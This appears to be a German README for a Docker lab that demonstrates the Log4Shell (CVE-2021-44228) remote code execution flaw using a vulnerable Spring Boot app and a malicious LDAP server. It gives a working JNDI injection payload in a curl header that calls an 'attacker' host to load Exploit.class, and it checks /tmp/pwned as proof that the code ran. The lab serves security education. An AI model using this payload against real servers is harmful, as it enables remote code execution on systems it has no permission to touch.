
Docker-basierte RCE-Exploit-Demo für Log4Shell (CVE-2021-44228) mit verwundbarer Spring Boot App, bösartigem LDAP-Server und Payload-Zustellung via JNDI-Injection.
Dieses Projekt simuliert ein RCE-Angriffsszenario über die Log4Shell-Schwachstelle in der Apache Log4j 2-Bibliothek.
Exploit.class bereitstellt.Voraussetzung: Docker und Docker Compose müssen installiert sein.
docker compose up --build
Warten, bis beide Container bereit sind. vulnerable-app läuft auf Port 8080.
Öffnen Sie ein neues Terminal und senden Sie eine Anfrage mit dem JNDI-Payload im Header X-Api-Version:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. Sie sehen die Protokollierung des Payloads.attacker. Sie sehen, dass die LDAP-Verbindung zum HTTP-Server umgeleitet wurde./tmp/pwned im Container vulnerable-app erstellt wurde:docker exec -it vulnerable-app ls -la /tmp/pwned
Wenn die Datei existiert, wurde der Schadcode Exploit.class erfolgreich ausgeführt!
Dieses Projekt dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Es darf keinesfalls für illegale Aktivitäten verwendet werden.